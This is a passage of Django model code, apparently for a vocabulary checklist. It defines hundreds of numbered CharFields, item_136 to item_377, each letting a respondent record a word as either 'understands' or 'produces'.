item_136_choices = [('understands', 'understands'), ('produces', 'produces')]
item_136 = models.CharField(max_length=11, choices=item_136_choices, null=True)
item_137_choices = [('understands', 'understands'), ('produces', 'produces')]
item_137 = models.CharField(max_length=11, choices=item_137_choices, null=True)
item_138_choices = [('understands', 'understands'), ('produces', 'produces')]
item_138 = models.CharField(max_length=11, choices=item_138_choices, null=True)
item_139_choices = [('understands', 'understands'), ('produces', 'produces')]
item_139 = models.CharField(max_length=11, choices=item_139_choices, null=True)
item_140_choices = [('understands', 'understands'), ('produces', 'produces')]
item_140 = models.CharField(max_length=11, choices=item_140_choices, null=True)
item_141_choices = [('understands', 'understands'), ('produces', 'produces')]
item_141 = models.CharField(max_length=11, choices=item_141_choices, null=True)
item_142_choices = [('understands', 'understands'), ('produces', 'produces')]
item_142 = models.CharField(max_length=11, choices=item_142_choices, null=True)
item_143_choices = [('understands', 'understands'), ('produces', 'produces')]
item_143 = models.CharField(max_length=11, choices=item_143_choices, null=True)
item_144_choices = [('understands', 'understands'), ('produces', 'produces')]
item_144 = models.CharField(max_length=11, choices=item_144_choices, null=True)
item_145_choices = [('understands', 'understands'), ('produces', 'produces')]
item_145 = models.CharField(max_length=11, choices=item_145_choices, null=True)
item_146_choices = [('understands', 'understands'), ('produces', 'produces')]
item_146 = models.CharField(max_length=11, choices=item_146_choices, null=True)
item_147_choices = [('understands', 'understands'), ('produces', 'produces')]
item_147 = models.CharField(max_length=11, choices=item_147_choices, null=True)
item_148_choices = [('understands', 'understands'), ('produces', 'produces')]
item_148 = models.CharField(max_length=11, choices=item_148_choices, null=True)
item_149_choices = [('understands', 'understands'), ('produces', 'produces')]
item_149 = models.CharField(max_length=11, choices=item_149_choices, null=True)
item_150_choices = [('understands', 'understands'), ('produces', 'produces')]
item_150 = models.CharField(max_length=11, choices=item_150_choices, null=True)
item_151_choices = [('understands', 'understands'), ('produces', 'produces')]
item_151 = models.CharField(max_length=11, choices=item_151_choices, null=True)
item_152_choices = [('understands', 'understands'), ('produces', 'produces')]
item_152 = models.CharField(max_length=11, choices=item_152_choices, null=True)
item_153_choices = [('understands', 'understands'), ('produces', 'produces')]
item_153 = models.CharField(max_length=11, choices=item_153_choices, null=True)
item_154_choices = [('understands', 'understands'), ('produces', 'produces')]
item_154 = models.CharField(max_length=11, choices=item_154_choices, null=True)
item_155_choices = [('understands', 'understands'), ('produces', 'produces')]
item_155 = models.CharField(max_length=11, choices=item_155_choices, null=True)
item_156_choices = [('understands', 'understands'), ('produces', 'produces')]
item_156 = models.CharField(max_length=11, choices=item_156_choices, null=True)
item_157_choices = [('understands', 'understands'), ('produces', 'produces')]
item_157 = models.CharField(max_length=11, choices=item_157_choices, null=True)
item_158_choices = [('understands', 'understands'), ('produces', 'produces')]
item_158 = models.CharField(max_length=11, choices=item_158_choices, null=True)
item_159_choices = [('understands', 'understands'), ('produces', 'produces')]
item_159 = models.CharField(max_length=11, choices=item_159_choices, null=True)
item_160_choices = [('understands', 'understands'), ('produces', 'produces')]
item_160 = models.CharField(max_length=11, choices=item_160_choices, null=True)
item_161_choices = [('understands', 'understands'), ('produces', 'produces')]
item_161 = models.CharField(max_length=11, choices=item_161_choices, null=True)
item_162_choices = [('understands', 'understands'), ('produces', 'produces')]
item_162 = models.CharField(max_length=11, choices=item_162_choices, null=True)
item_163_choices = [('understands', 'understands'), ('produces', 'produces')]
item_163 = models.CharField(max_length=11, choices=item_163_choices, null=True)
item_164_choices = [('understands', 'understands'), ('produces', 'produces')]
item_164 = models.CharField(max_length=11, choices=item_164_choices, null=True)
item_165_choices = [('understands', 'understands'), ('produces', 'produces')]
item_165 = models.CharField(max_length=11, choices=item_165_choices, null=True)
item_166_choices = [('understands', 'understands'), ('produces', 'produces')]
item_166 = models.CharField(max_length=11, choices=item_166_choices, null=True)
item_167_choices = [('understands', 'understands'), ('produces', 'produces')]
item_167 = models.CharField(max_length=11, choices=item_167_choices, null=True)
item_168_choices = [('understands', 'understands'), ('produces', 'produces')]
item_168 = models.CharField(max_length=11, choices=item_168_choices, null=True)
item_169_choices = [('understands', 'understands'), ('produces', 'produces')]
item_169 = models.CharField(max_length=11, choices=item_169_choices, null=True)
item_170_choices = [('understands', 'understands'), ('produces', 'produces')]
item_170 = models.CharField(max_length=11, choices=item_170_choices, null=True)
item_171_choices = [('understands', 'understands'), ('produces', 'produces')]
item_171 = models.CharField(max_length=11, choices=item_171_choices, null=True)
item_172_choices = [('understands', 'understands'), ('produces', 'produces')]
item_172 = models.CharField(max_length=11, choices=item_172_choices, null=True)
item_173_choices = [('understands', 'understands'), ('produces', 'produces')]
item_173 = models.CharField(max_length=11, choices=item_173_choices, null=True)
item_174_choices = [('understands', 'understands'), ('produces', 'produces')]
item_174 = models.CharField(max_length=11, choices=item_174_choices, null=True)
item_175_choices = [('understands', 'understands'), ('produces', 'produces')]
item_175 = models.CharField(max_length=11, choices=item_175_choices, null=True)
item_176_choices = [('understands', 'understands'), ('produces', 'produces')]
item_176 = models.CharField(max_length=11, choices=item_176_choices, null=True)
item_177_choices = [('understands', 'understands'), ('produces', 'produces')]
item_177 = models.CharField(max_length=11, choices=item_177_choices, null=True)
item_178_choices = [('understands', 'understands'), ('produces', 'produces')]
item_178 = models.CharField(max_length=11, choices=item_178_choices, null=True)
item_179_choices = [('understands', 'understands'), ('produces', 'produces')]
item_179 = models.CharField(max_length=11, choices=item_179_choices, null=True)
item_180_choices = [('understands', 'understands'), ('produces', 'produces')]
item_180 = models.CharField(max_length=11, choices=item_180_choices, null=True)
item_181_choices = [('understands', 'understands'), ('produces', 'produces')]
item_181 = models.CharField(max_length=11, choices=item_181_choices, null=True)
item_182_choices = [('understands', 'understands'), ('produces', 'produces')]
item_182 = models.CharField(max_length=11, choices=item_182_choices, null=True)
item_183_choices = [('understands', 'understands'), ('produces', 'produces')]
item_183 = models.CharField(max_length=11, choices=item_183_choices, null=True)
item_184_choices = [('understands', 'understands'), ('produces', 'produces')]
item_184 = models.CharField(max_length=11, choices=item_184_choices, null=True)
item_185_choices = [('understands', 'understands'), ('produces', 'produces')]
item_185 = models.CharField(max_length=11, choices=item_185_choices, null=True)
item_186_choices = [('understands', 'understands'), ('produces', 'produces')]
item_186 = models.CharField(max_length=11, choices=item_186_choices, null=True)
item_187_choices = [('understands', 'understands'), ('produces', 'produces')]
item_187 = models.CharField(max_length=11, choices=item_187_choices, null=True)
item_188_choices = [('understands', 'understands'), ('produces', 'produces')]
item_188 = models.CharField(max_length=11, choices=item_188_choices, null=True)
item_189_choices = [('understands', 'understands'), ('produces', 'produces')]
item_189 = models.CharField(max_length=11, choices=item_189_choices, null=True)
item_190_choices = [('understands', 'understands'), ('produces', 'produces')]
item_190 = models.CharField(max_length=11, choices=item_190_choices, null=True)
item_191_choices = [('understands', 'understands'), ('produces', 'produces')]
item_191 = models.CharField(max_length=11, choices=item_191_choices, null=True)
item_192_choices = [('understands', 'understands'), ('produces', 'produces')]
item_192 = models.CharField(max_length=11, choices=item_192_choices, null=True)
item_193_choices = [('understands', 'understands'), ('produces', 'produces')]
item_193 = models.CharField(max_length=11, choices=item_193_choices, null=True)
item_194_choices = [('understands', 'understands'), ('produces', 'produces')]
item_194 = models.CharField(max_length=11, choices=item_194_choices, null=True)
item_195_choices = [('understands', 'understands'), ('produces', 'produces')]
item_195 = models.CharField(max_length=11, choices=item_195_choices, null=True)
item_196_choices = [('understands', 'understands'), ('produces', 'produces')]
item_196 = models.CharField(max_length=11, choices=item_196_choices, null=True)
item_197_choices = [('understands', 'understands'), ('produces', 'produces')]
item_197 = models.CharField(max_length=11, choices=item_197_choices, null=True)
item_198_choices = [('understands', 'understands'), ('produces', 'produces')]
item_198 = models.CharField(max_length=11, choices=item_198_choices, null=True)
item_199_choices = [('understands', 'understands'), ('produces', 'produces')]
item_199 = models.CharField(max_length=11, choices=item_199_choices, null=True)
item_200_choices = [('understands', 'understands'), ('produces', 'produces')]
item_200 = models.CharField(max_length=11, choices=item_200_choices, null=True)
item_201_choices = [('understands', 'understands'), ('produces', 'produces')]
item_201 = models.CharField(max_length=11, choices=item_201_choices, null=True)
item_202_choices = [('understands', 'understands'), ('produces', 'produces')]
item_202 = models.CharField(max_length=11, choices=item_202_choices, null=True)
item_203_choices = [('understands', 'understands'), ('produces', 'produces')]
item_203 = models.CharField(max_length=11, choices=item_203_choices, null=True)
item_204_choices = [('understands', 'understands'), ('produces', 'produces')]
item_204 = models.CharField(max_length=11, choices=item_204_choices, null=True)
item_205_choices = [('understands', 'understands'), ('produces', 'produces')]
item_205 = models.CharField(max_length=11, choices=item_205_choices, null=True)
item_206_choices = [('understands', 'understands'), ('produces', 'produces')]
item_206 = models.CharField(max_length=11, choices=item_206_choices, null=True)
item_207_choices = [('understands', 'understands'), ('produces', 'produces')]
item_207 = models.CharField(max_length=11, choices=item_207_choices, null=True)
item_208_choices = [('understands', 'understands'), ('produces', 'produces')]
item_208 = models.CharField(max_length=11, choices=item_208_choices, null=True)
item_209_choices = [('understands', 'understands'), ('produces', 'produces')]
item_209 = models.CharField(max_length=11, choices=item_209_choices, null=True)
item_210_choices = [('understands', 'understands'), ('produces', 'produces')]
item_210 = models.CharField(max_length=11, choices=item_210_choices, null=True)
item_211_choices = [('understands', 'understands'), ('produces', 'produces')]
item_211 = models.CharField(max_length=11, choices=item_211_choices, null=True)
item_212_choices = [('understands', 'understands'), ('produces', 'produces')]
item_212 = models.CharField(max_length=11, choices=item_212_choices, null=True)
item_213_choices = [('understands', 'understands'), ('produces', 'produces')]
item_213 = models.CharField(max_length=11, choices=item_213_choices, null=True)
item_214_choices = [('understands', 'understands'), ('produces', 'produces')]
item_214 = models.CharField(max_length=11, choices=item_214_choices, null=True)
item_215_choices = [('understands', 'understands'), ('produces', 'produces')]
item_215 = models.CharField(max_length=11, choices=item_215_choices, null=True)
item_216_choices = [('understands', 'understands'), ('produces', 'produces')]
item_216 = models.CharField(max_length=11, choices=item_216_choices, null=True)
item_217_choices = [('understands', 'understands'), ('produces', 'produces')]
item_217 = models.CharField(max_length=11, choices=item_217_choices, null=True)
item_218_choices = [('understands', 'understands'), ('produces', 'produces')]
item_218 = models.CharField(max_length=11, choices=item_218_choices, null=True)
item_219_choices = [('understands', 'understands'), ('produces', 'produces')]
item_219 = models.CharField(max_length=11, choices=item_219_choices, null=True)
item_220_choices = [('understands', 'understands'), ('produces', 'produces')]
item_220 = models.CharField(max_length=11, choices=item_220_choices, null=True)
item_221_choices = [('understands', 'understands'), ('produces', 'produces')]
item_221 = models.CharField(max_length=11, choices=item_221_choices, null=True)
item_222_choices = [('understands', 'understands'), ('produces', 'produces')]
item_222 = models.CharField(max_length=11, choices=item_222_choices, null=True)
item_223_choices = [('understands', 'understands'), ('produces', 'produces')]
item_223 = models.CharField(max_length=11, choices=item_223_choices, null=True)
item_224_choices = [('understands', 'understands'), ('produces', 'produces')]
item_224 = models.CharField(max_length=11, choices=item_224_choices, null=True)
item_225_choices = [('understands', 'understands'), ('produces', 'produces')]
item_225 = models.CharField(max_length=11, choices=item_225_choices, null=True)
item_226_choices = [('understands', 'understands'), ('produces', 'produces')]
item_226 = models.CharField(max_length=11, choices=item_226_choices, null=True)
item_227_choices = [('understands', 'understands'), ('produces', 'produces')]
item_227 = models.CharField(max_length=11, choices=item_227_choices, null=True)
item_228_choices = [('understands', 'understands'), ('produces', 'produces')]
item_228 = models.CharField(max_length=11, choices=item_228_choices, null=True)
item_229_choices = [('understands', 'understands'), ('produces', 'produces')]
item_229 = models.CharField(max_length=11, choices=item_229_choices, null=True)
item_230_choices = [('understands', 'understands'), ('produces', 'produces')]
item_230 = models.CharField(max_length=11, choices=item_230_choices, null=True)
item_231_choices = [('understands', 'understands'), ('produces', 'produces')]
item_231 = models.CharField(max_length=11, choices=item_231_choices, null=True)
item_232_choices = [('understands', 'understands'), ('produces', 'produces')]
item_232 = models.CharField(max_length=11, choices=item_232_choices, null=True)
item_233_choices = [('understands', 'understands'), ('produces', 'produces')]
item_233 = models.CharField(max_length=11, choices=item_233_choices, null=True)
item_234_choices = [('understands', 'understands'), ('produces', 'produces')]
item_234 = models.CharField(max_length=11, choices=item_234_choices, null=True)
item_235_choices = [('understands', 'understands'), ('produces', 'produces')]
item_235 = models.CharField(max_length=11, choices=item_235_choices, null=True)
item_236_choices = [('understands', 'understands'), ('produces', 'produces')]
item_236 = models.CharField(max_length=11, choices=item_236_choices, null=True)
item_237_choices = [('understands', 'understands'), ('produces', 'produces')]
item_237 = models.CharField(max_length=11, choices=item_237_choices, null=True)
item_238_choices = [('understands', 'understands'), ('produces', 'produces')]
item_238 = models.CharField(max_length=11, choices=item_238_choices, null=True)
item_239_choices = [('understands', 'understands'), ('produces', 'produces')]
item_239 = models.CharField(max_length=11, choices=item_239_choices, null=True)
item_240_choices = [('understands', 'understands'), ('produces', 'produces')]
item_240 = models.CharField(max_length=11, choices=item_240_choices, null=True)
item_241_choices = [('understands', 'understands'), ('produces', 'produces')]
item_241 = models.CharField(max_length=11, choices=item_241_choices, null=True)
item_242_choices = [('understands', 'understands'), ('produces', 'produces')]
item_242 = models.CharField(max_length=11, choices=item_242_choices, null=True)
item_243_choices = [('understands', 'understands'), ('produces', 'produces')]
item_243 = models.CharField(max_length=11, choices=item_243_choices, null=True)
item_244_choices = [('understands', 'understands'), ('produces', 'produces')]
item_244 = models.CharField(max_length=11, choices=item_244_choices, null=True)
item_245_choices = [('understands', 'understands'), ('produces', 'produces')]
item_245 = models.CharField(max_length=11, choices=item_245_choices, null=True)
item_246_choices = [('understands', 'understands'), ('produces', 'produces')]
item_246 = models.CharField(max_length=11, choices=item_246_choices, null=True)
item_247_choices = [('understands', 'understands'), ('produces', 'produces')]
item_247 = models.CharField(max_length=11, choices=item_247_choices, null=True)
item_248_choices = [('understands', 'understands'), ('produces', 'produces')]
item_248 = models.CharField(max_length=11, choices=item_248_choices, null=True)
item_249_choices = [('understands', 'understands'), ('produces', 'produces')]
item_249 = models.CharField(max_length=11, choices=item_249_choices, null=True)
item_250_choices = [('understands', 'understands'), ('produces', 'produces')]
item_250 = models.CharField(max_length=11, choices=item_250_choices, null=True)
item_251_choices = [('understands', 'understands'), ('produces', 'produces')]
item_251 = models.CharField(max_length=11, choices=item_251_choices, null=True)
item_252_choices = [('understands', 'understands'), ('produces', 'produces')]
item_252 = models.CharField(max_length=11, choices=item_252_choices, null=True)
item_253_choices = [('understands', 'understands'), ('produces', 'produces')]
item_253 = models.CharField(max_length=11, choices=item_253_choices, null=True)
item_254_choices = [('understands', 'understands'), ('produces', 'produces')]
item_254 = models.CharField(max_length=11, choices=item_254_choices, null=True)
item_255_choices = [('understands', 'understands'), ('produces', 'produces')]
item_255 = models.CharField(max_length=11, choices=item_255_choices, null=True)
item_256_choices = [('understands', 'understands'), ('produces', 'produces')]
item_256 = models.CharField(max_length=11, choices=item_256_choices, null=True)
item_257_choices = [('understands', 'understands'), ('produces', 'produces')]
item_257 = models.CharField(max_length=11, choices=item_257_choices, null=True)
item_258_choices = [('understands', 'understands'), ('produces', 'produces')]
item_258 = models.CharField(max_length=11, choices=item_258_choices, null=True)
item_259_choices = [('understands', 'understands'), ('produces', 'produces')]
item_259 = models.CharField(max_length=11, choices=item_259_choices, null=True)
item_260_choices = [('understands', 'understands'), ('produces', 'produces')]
item_260 = models.CharField(max_length=11, choices=item_260_choices, null=True)
item_261_choices = [('understands', 'understands'), ('produces', 'produces')]
item_261 = models.CharField(max_length=11, choices=item_261_choices, null=True)
item_262_choices = [('understands', 'understands'), ('produces', 'produces')]
item_262 = models.CharField(max_length=11, choices=item_262_choices, null=True)
item_263_choices = [('understands', 'understands'), ('produces', 'produces')]
item_263 = models.CharField(max_length=11, choices=item_263_choices, null=True)
item_264_choices = [('understands', 'understands'), ('produces', 'produces')]
item_264 = models.CharField(max_length=11, choices=item_264_choices, null=True)
item_265_choices = [('understands', 'understands'), ('produces', 'produces')]
item_265 = models.CharField(max_length=11, choices=item_265_choices, null=True)
item_266_choices = [('understands', 'understands'), ('produces', 'produces')]
item_266 = models.CharField(max_length=11, choices=item_266_choices, null=True)
item_267_choices = [('understands', 'understands'), ('produces', 'produces')]
item_267 = models.CharField(max_length=11, choices=item_267_choices, null=True)
item_268_choices = [('understands', 'understands'), ('produces', 'produces')]
item_268 = models.CharField(max_length=11, choices=item_268_choices, null=True)
item_269_choices = [('understands', 'understands'), ('produces', 'produces')]
item_269 = models.CharField(max_length=11, choices=item_269_choices, null=True)
item_270_choices = [('understands', 'understands'), ('produces', 'produces')]
item_270 = models.CharField(max_length=11, choices=item_270_choices, null=True)
item_271_choices = [('understands', 'understands'), ('produces', 'produces')]
item_271 = models.CharField(max_length=11, choices=item_271_choices, null=True)
item_272_choices = [('understands', 'understands'), ('produces', 'produces')]
item_272 = models.CharField(max_length=11, choices=item_272_choices, null=True)
item_273_choices = [('understands', 'understands'), ('produces', 'produces')]
item_273 = models.CharField(max_length=11, choices=item_273_choices, null=True)
item_274_choices = [('understands', 'understands'), ('produces', 'produces')]
item_274 = models.CharField(max_length=11, choices=item_274_choices, null=True)
item_275_choices = [('understands', 'understands'), ('produces', 'produces')]
item_275 = models.CharField(max_length=11, choices=item_275_choices, null=True)
item_276_choices = [('understands', 'understands'), ('produces', 'produces')]
item_276 = models.CharField(max_length=11, choices=item_276_choices, null=True)
item_277_choices = [('understands', 'understands'), ('produces', 'produces')]
item_277 = models.CharField(max_length=11, choices=item_277_choices, null=True)
item_278_choices = [('understands', 'understands'), ('produces', 'produces')]
item_278 = models.CharField(max_length=11, choices=item_278_choices, null=True)
item_279_choices = [('understands', 'understands'), ('produces', 'produces')]
item_279 = models.CharField(max_length=11, choices=item_279_choices, null=True)
item_280_choices = [('understands', 'understands'), ('produces', 'produces')]
item_280 = models.CharField(max_length=11, choices=item_280_choices, null=True)
item_281_choices = [('understands', 'understands'), ('produces', 'produces')]
item_281 = models.CharField(max_length=11, choices=item_281_choices, null=True)
item_282_choices = [('understands', 'understands'), ('produces', 'produces')]
item_282 = models.CharField(max_length=11, choices=item_282_choices, null=True)
item_283_choices = [('understands', 'understands'), ('produces', 'produces')]
item_283 = models.CharField(max_length=11, choices=item_283_choices, null=True)
item_284_choices = [('understands', 'understands'), ('produces', 'produces')]
item_284 = models.CharField(max_length=11, choices=item_284_choices, null=True)
item_285_choices = [('understands', 'understands'), ('produces', 'produces')]
item_285 = models.CharField(max_length=11, choices=item_285_choices, null=True)
item_286_choices = [('understands', 'understands'), ('produces', 'produces')]
item_286 = models.CharField(max_length=11, choices=item_286_choices, null=True)
item_287_choices = [('understands', 'understands'), ('produces', 'produces')]
item_287 = models.CharField(max_length=11, choices=item_287_choices, null=True)
item_288_choices = [('understands', 'understands'), ('produces', 'produces')]
item_288 = models.CharField(max_length=11, choices=item_288_choices, null=True)
item_289_choices = [('understands', 'understands'), ('produces', 'produces')]
item_289 = models.CharField(max_length=11, choices=item_289_choices, null=True)
item_290_choices = [('understands', 'understands'), ('produces', 'produces')]
item_290 = models.CharField(max_length=11, choices=item_290_choices, null=True)
item_291_choices = [('understands', 'understands'), ('produces', 'produces')]
item_291 = models.CharField(max_length=11, choices=item_291_choices, null=True)
item_292_choices = [('understands', 'understands'), ('produces', 'produces')]
item_292 = models.CharField(max_length=11, choices=item_292_choices, null=True)
item_293_choices = [('understands', 'understands'), ('produces', 'produces')]
item_293 = models.CharField(max_length=11, choices=item_293_choices, null=True)
item_294_choices = [('understands', 'understands'), ('produces', 'produces')]
item_294 = models.CharField(max_length=11, choices=item_294_choices, null=True)
item_295_choices = [('understands', 'understands'), ('produces', 'produces')]
item_295 = models.CharField(max_length=11, choices=item_295_choices, null=True)
item_296_choices = [('understands', 'understands'), ('produces', 'produces')]
item_296 = models.CharField(max_length=11, choices=item_296_choices, null=True)
item_297_choices = [('understands', 'understands'), ('produces', 'produces')]
item_297 = models.CharField(max_length=11, choices=item_297_choices, null=True)
item_298_choices = [('understands', 'understands'), ('produces', 'produces')]
item_298 = models.CharField(max_length=11, choices=item_298_choices, null=True)
item_299_choices = [('understands', 'understands'), ('produces', 'produces')]
item_299 = models.CharField(max_length=11, choices=item_299_choices, null=True)
item_300_choices = [('understands', 'understands'), ('produces', 'produces')]
item_300 = models.CharField(max_length=11, choices=item_300_choices, null=True)
item_301_choices = [('understands', 'understands'), ('produces', 'produces')]
item_301 = models.CharField(max_length=11, choices=item_301_choices, null=True)
item_302_choices = [('understands', 'understands'), ('produces', 'produces')]
item_302 = models.CharField(max_length=11, choices=item_302_choices, null=True)
item_303_choices = [('understands', 'understands'), ('produces', 'produces')]
item_303 = models.CharField(max_length=11, choices=item_303_choices, null=True)
item_304_choices = [('understands', 'understands'), ('produces', 'produces')]
item_304 = models.CharField(max_length=11, choices=item_304_choices, null=True)
item_305_choices = [('understands', 'understands'), ('produces', 'produces')]
item_305 = models.CharField(max_length=11, choices=item_305_choices, null=True)
item_306_choices = [('understands', 'understands'), ('produces', 'produces')]
item_306 = models.CharField(max_length=11, choices=item_306_choices, null=True)
item_307_choices = [('understands', 'understands'), ('produces', 'produces')]
item_307 = models.CharField(max_length=11, choices=item_307_choices, null=True)
item_308_choices = [('understands', 'understands'), ('produces', 'produces')]
item_308 = models.CharField(max_length=11, choices=item_308_choices, null=True)
item_309_choices = [('understands', 'understands'), ('produces', 'produces')]
item_309 = models.CharField(max_length=11, choices=item_309_choices, null=True)
item_310_choices = [('understands', 'understands'), ('produces', 'produces')]
item_310 = models.CharField(max_length=11, choices=item_310_choices, null=True)
item_311_choices = [('understands', 'understands'), ('produces', 'produces')]
item_311 = models.CharField(max_length=11, choices=item_311_choices, null=True)
item_312_choices = [('understands', 'understands'), ('produces', 'produces')]
item_312 = models.CharField(max_length=11, choices=item_312_choices, null=True)
item_313_choices = [('understands', 'understands'), ('produces', 'produces')]
item_313 = models.CharField(max_length=11, choices=item_313_choices, null=True)
item_314_choices = [('understands', 'understands'), ('produces', 'produces')]
item_314 = models.CharField(max_length=11, choices=item_314_choices, null=True)
item_315_choices = [('understands', 'understands'), ('produces', 'produces')]
item_315 = models.CharField(max_length=11, choices=item_315_choices, null=True)
item_316_choices = [('understands', 'understands'), ('produces', 'produces')]
item_316 = models.CharField(max_length=11, choices=item_316_choices, null=True)
item_317_choices = [('understands', 'understands'), ('produces', 'produces')]
item_317 = models.CharField(max_length=11, choices=item_317_choices, null=True)
item_318_choices = [('understands', 'understands'), ('produces', 'produces')]
item_318 = models.CharField(max_length=11, choices=item_318_choices, null=True)
item_319_choices = [('understands', 'understands'), ('produces', 'produces')]
item_319 = models.CharField(max_length=11, choices=item_319_choices, null=True)
item_320_choices = [('understands', 'understands'), ('produces', 'produces')]
item_320 = models.CharField(max_length=11, choices=item_320_choices, null=True)
item_321_choices = [('understands', 'understands'), ('produces', 'produces')]
item_321 = models.CharField(max_length=11, choices=item_321_choices, null=True)
item_322_choices = [('understands', 'understands'), ('produces', 'produces')]
item_322 = models.CharField(max_length=11, choices=item_322_choices, null=True)
item_323_choices = [('understands', 'understands'), ('produces', 'produces')]
item_323 = models.CharField(max_length=11, choices=item_323_choices, null=True)
item_324_choices = [('understands', 'understands'), ('produces', 'produces')]
item_324 = models.CharField(max_length=11, choices=item_324_choices, null=True)
item_325_choices = [('understands', 'understands'), ('produces', 'produces')]
item_325 = models.CharField(max_length=11, choices=item_325_choices, null=True)
item_326_choices = [('understands', 'understands'), ('produces', 'produces')]
item_326 = models.CharField(max_length=11, choices=item_326_choices, null=True)
item_327_choices = [('understands', 'understands'), ('produces', 'produces')]
item_327 = models.CharField(max_length=11, choices=item_327_choices, null=True)
item_328_choices = [('understands', 'understands'), ('produces', 'produces')]
item_328 = models.CharField(max_length=11, choices=item_328_choices, null=True)
item_329_choices = [('understands', 'understands'), ('produces', 'produces')]
item_329 = models.CharField(max_length=11, choices=item_329_choices, null=True)
item_330_choices = [('understands', 'understands'), ('produces', 'produces')]
item_330 = models.CharField(max_length=11, choices=item_330_choices, null=True)
item_331_choices = [('understands', 'understands'), ('produces', 'produces')]
item_331 = models.CharField(max_length=11, choices=item_331_choices, null=True)
item_332_choices = [('understands', 'understands'), ('produces', 'produces')]
item_332 = models.CharField(max_length=11, choices=item_332_choices, null=True)
item_333_choices = [('understands', 'understands'), ('produces', 'produces')]
item_333 = models.CharField(max_length=11, choices=item_333_choices, null=True)
item_334_choices = [('understands', 'understands'), ('produces', 'produces')]
item_334 = models.CharField(max_length=11, choices=item_334_choices, null=True)
item_335_choices = [('understands', 'understands'), ('produces', 'produces')]
item_335 = models.CharField(max_length=11, choices=item_335_choices, null=True)
item_336_choices = [('understands', 'understands'), ('produces', 'produces')]
item_336 = models.CharField(max_length=11, choices=item_336_choices, null=True)
item_337_choices = [('understands', 'understands'), ('produces', 'produces')]
item_337 = models.CharField(max_length=11, choices=item_337_choices, null=True)
item_338_choices = [('understands', 'understands'), ('produces', 'produces')]
item_338 = models.CharField(max_length=11, choices=item_338_choices, null=True)
item_339_choices = [('understands', 'understands'), ('produces', 'produces')]
item_339 = models.CharField(max_length=11, choices=item_339_choices, null=True)
item_340_choices = [('understands', 'understands'), ('produces', 'produces')]
item_340 = models.CharField(max_length=11, choices=item_340_choices, null=True)
item_341_choices = [('understands', 'understands'), ('produces', 'produces')]
item_341 = models.CharField(max_length=11, choices=item_341_choices, null=True)
item_342_choices = [('understands', 'understands'), ('produces', 'produces')]
item_342 = models.CharField(max_length=11, choices=item_342_choices, null=True)
item_343_choices = [('understands', 'understands'), ('produces', 'produces')]
item_343 = models.CharField(max_length=11, choices=item_343_choices, null=True)
item_344_choices = [('understands', 'understands'), ('produces', 'produces')]
item_344 = models.CharField(max_length=11, choices=item_344_choices, null=True)
item_345_choices = [('understands', 'understands'), ('produces', 'produces')]
item_345 = models.CharField(max_length=11, choices=item_345_choices, null=True)
item_346_choices = [('understands', 'understands'), ('produces', 'produces')]
item_346 = models.CharField(max_length=11, choices=item_346_choices, null=True)
item_347_choices = [('understands', 'understands'), ('produces', 'produces')]
item_347 = models.CharField(max_length=11, choices=item_347_choices, null=True)
item_348_choices = [('understands', 'understands'), ('produces', 'produces')]
item_348 = models.CharField(max_length=11, choices=item_348_choices, null=True)
item_349_choices = [('understands', 'understands'), ('produces', 'produces')]
item_349 = models.CharField(max_length=11, choices=item_349_choices, null=True)
item_350_choices = [('understands', 'understands'), ('produces', 'produces')]
item_350 = models.CharField(max_length=11, choices=item_350_choices, null=True)
item_351_choices = [('understands', 'understands'), ('produces', 'produces')]
item_351 = models.CharField(max_length=11, choices=item_351_choices, null=True)
item_352_choices = [('understands', 'understands'), ('produces', 'produces')]
item_352 = models.CharField(max_length=11, choices=item_352_choices, null=True)
item_353_choices = [('understands', 'understands'), ('produces', 'produces')]
item_353 = models.CharField(max_length=11, choices=item_353_choices, null=True)
item_354_choices = [('understands', 'understands'), ('produces', 'produces')]
item_354 = models.CharField(max_length=11, choices=item_354_choices, null=True)
item_355_choices = [('understands', 'understands'), ('produces', 'produces')]
item_355 = models.CharField(max_length=11, choices=item_355_choices, null=True)
item_356_choices = [('understands', 'understands'), ('produces', 'produces')]
item_356 = models.CharField(max_length=11, choices=item_356_choices, null=True)
item_357_choices = [('understands', 'understands'), ('produces', 'produces')]
item_357 = models.CharField(max_length=11, choices=item_357_choices, null=True)
item_358_choices = [('understands', 'understands'), ('produces', 'produces')]
item_358 = models.CharField(max_length=11, choices=item_358_choices, null=True)
item_359_choices = [('understands', 'understands'), ('produces', 'produces')]
item_359 = models.CharField(max_length=11, choices=item_359_choices, null=True)
item_360_choices = [('understands', 'understands'), ('produces', 'produces')]
item_360 = models.CharField(max_length=11, choices=item_360_choices, null=True)
item_361_choices = [('understands', 'understands'), ('produces', 'produces')]
item_361 = models.CharField(max_length=11, choices=item_361_choices, null=True)
item_362_choices = [('understands', 'understands'), ('produces', 'produces')]
item_362 = models.CharField(max_length=11, choices=item_362_choices, null=True)
item_363_choices = [('understands', 'understands'), ('produces', 'produces')]
item_363 = models.CharField(max_length=11, choices=item_363_choices, null=True)
item_364_choices = [('understands', 'understands'), ('produces', 'produces')]
item_364 = models.CharField(max_length=11, choices=item_364_choices, null=True)
item_365_choices = [('understands', 'understands'), ('produces', 'produces')]
item_365 = models.CharField(max_length=11, choices=item_365_choices, null=True)
item_366_choices = [('understands', 'understands'), ('produces', 'produces')]
item_366 = models.CharField(max_length=11, choices=item_366_choices, null=True)
item_367_choices = [('understands', 'understands'), ('produces', 'produces')]
item_367 = models.CharField(max_length=11, choices=item_367_choices, null=True)
item_368_choices = [('understands', 'understands'), ('produces', 'produces')]
item_368 = models.CharField(max_length=11, choices=item_368_choices, null=True)
item_369_choices = [('understands', 'understands'), ('produces', 'produces')]
item_369 = models.CharField(max_length=11, choices=item_369_choices, null=True)
item_370_choices = [('understands', 'understands'), ('produces', 'produces')]
item_370 = models.CharField(max_length=11, choices=item_370_choices, null=True)
item_371_choices = [('understands', 'understands'), ('produces', 'produces')]
item_371 = models.CharField(max_length=11, choices=item_371_choices, null=True)
item_372_choices = [('understands', 'understands'), ('produces', 'produces')]
item_372 = models.CharField(max_length=11, choices=item_372_choices, null=True)
item_373_choices = [('understands', 'understands'), ('produces', 'produces')]
item_373 = models.CharField(max_length=11, choices=item_373_choices, null=True)
item_374_choices = [('understands', 'understands'), ('produces', 'produces')]
item_374 = models.CharField(max_length=11, choices=item_374_choices, null=True)
item_375_choices = [('understands', 'understands'), ('produces', 'produces')]
item_375 = models.CharField(max_length=11, choices=item_375_choices, null=True)
item_376_choices = [('understands', 'understands'), ('produces', 'produces')]
item_376 = models.CharField(max_length=11, choices=item_376_choices, null=True)
item_377_choices = [('understands', 'understands'), ('produces', 'produces')]
